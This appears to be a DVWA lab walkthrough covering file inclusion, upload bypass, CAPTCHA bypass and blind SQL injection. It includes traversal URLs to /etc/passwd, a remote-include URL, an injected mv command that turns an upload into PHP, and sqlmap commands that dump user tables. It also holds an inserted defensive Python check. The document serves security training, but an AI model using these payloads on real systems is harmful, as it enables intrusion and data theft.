This is the second part exploring DVWA. For the first part, click here.

In this post, we will see vulnerabilities for:

  • File inclusion
  • File upload
  • Captcha
  • SQL

File inclusion

This vulnerability appears in dynamic PHP pages when the file to include is taken from a request parameter without proper validation. Because of that programming fault, an attacker can manipulate the parameter and make the page include files it was never meant to expose.

LOW - MEDIUM - HIGH:

LOW:

  • https://127.0.0.1/DVWA/vulnerabilities/fi/?page=file4.php
  • https://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../robots.txt
  • https://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../phpinfo.php
  • https://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../bootmgr
  • https://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../../../../../etc/passwd
  • http://127.0.0.1/DVWA/vulnerabilities/fi/?page=http://127.0.0.1/evilphp.php

MEDIUM: We can't use ../, so change it to ..././ :

  • https://127.0.0.1/DVWA/vulnerabilities/fi/?page=..././..././robots.txt

HIGH: Try to use this:

  • https://127.0.0.1/DVWA/vulnerabilities/fi/?page=file:///var/www/html/DVWA/robots.txt
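As an added illustration (not code from this post or from DVWA itself), the Python below contrasts a deny-list filter of the kind the medium level uses, where a single replacement pass turns ..././ back into ../, with the allow-list plus canonical-path containment check that actually keeps includes inside the intended directory. The include root, the allow-list contents and the function names are assumptions made for the example.

```python
import posixpath
from typing import Iterable, Optional

# Assumed include root and allow-list for the example; DVWA's real layout may differ.
INCLUDE_ROOT = "/var/www/html/DVWA/vulnerabilities/fi"
ALLOWED_PAGES = frozenset({"file1.php", "file2.php", "file3.php"})


def blacklist_filter(page: str) -> str:
    """Deny-list filter in the style of the medium level: each bad substring is
    removed in one non-recursive pass. Shown only to illustrate why it fails."""
    for bad in ("http://", "https://", "../", "..\\"):
        page = page.replace(bad, "")
    return page


def resolve_include(page: str,
                    allowed: Optional[Iterable[str]] = ALLOWED_PAGES) -> Optional[str]:
    """Return the absolute path to include, or None if the request is rejected.

    Two independent controls are applied:
      1. an allow-list of page names (pass allowed=None to exercise containment alone);
      2. a canonical-path check that the result stays inside INCLUDE_ROOT.
    """
    # Reject URLs and PHP stream wrappers (http://, file://, php://, ...) outright.
    if "://" in page:
        return None
    if allowed is not None and page not in set(allowed):
        return None
    # Canonicalise lexically. posixpath.join discards the root for absolute input,
    # so a bare "/etc/passwd" also fails the containment check below.
    full = posixpath.normpath(posixpath.join(INCLUDE_ROOT, page))
    if not full.startswith(INCLUDE_ROOT + "/"):
        return None
    return full
```

Run resolve_include over the filtered output of blacklist_filter to see that the canonical-path check rejects what the deny-list let through.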

File upload

You can encapsulate malicious code in inert file types.

LOW - MEDIUM - HIGH:

  • LOW: Upload a malicious file.
  • MEDIUM: Send a POST request with the malicious file and change the Content-Type header to image/jpeg.
  • HIGH: Change the malicious file's extension to jpeg and change its file signature (magic bytes) to the JPEG signature with hexedit. Then, in the command injection section, enter:
    127.0.0.1|mv ../../hackable/uploads/test.png ../../hackable/uploads/test.php

Insecure Captcha

CAPTCHAs are generally used to ensure that an action is performed by a human rather than by an automated script.

LOW - MEDIUM - HIGH:

LOW: Change step=1 to step=2 in the request:

http://127.0.0.1/DVWA/vulnerabilities/captcha/?step=2&password_new=q&password_conf=q&Change=Change

MEDIUM: We also need to set the passed_captcha parameter to true:

http://127.0.0.1/DVWA/vulnerabilities/captcha/?step=2&password_new=q&password_conf=q&passed_captcha=true&Change=Change

HIGH: Change the User-Agent header to reCAPTCHA and send:

http://127.0.0.1/DVWA/vulnerabilities/captcha/?step=1&password_new=123&password_conf=123&recaptcha_response_field=hidd3n_valu3&Change=Change

Blind SQL injection

This is a type of SQL injection attack that asks the database true-or-false questions and determines the answer from the application's response.

LOW - MEDIUM - HIGH:

LOW: Whether by hand or with wordlists, all we get back is the same message (whether or not the user ID exists in the database). For this reason, we will use the sqlmap tool.

sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1+or+sleep%28__TIME__%29%23&Submit=Submit" --cookie="security=low; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n" --dbs
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1+or+sleep%28__TIME__%29%23&Submit=Submit" --cookie="security=low; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n" -D dvwa --tables

sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1+or+sleep%28__TIME__%29%23&Submit=Submit" --cookie="security=low; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n" -D dvwa -T users --dump

MEDIUM:

sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/" --cookie="security=medium; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n" --data="id=3&Submit=Submit" --dbs
// OPTION 2:
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="security=medium; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n" --dbs
// and then follow the same steps as for the low level

HIGH:

  • Referer: https://127.0.0.1/DVWA/vulnerabilities/sqli_blind/cookie-input.php
  • Cookie: id=1%27; security=high; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n
  • Data: id=1%27&Submit=Submit

sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1%27&Submit=Submit" --cookie="security=high; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n" --dbs
// and then follow the same steps as for the low level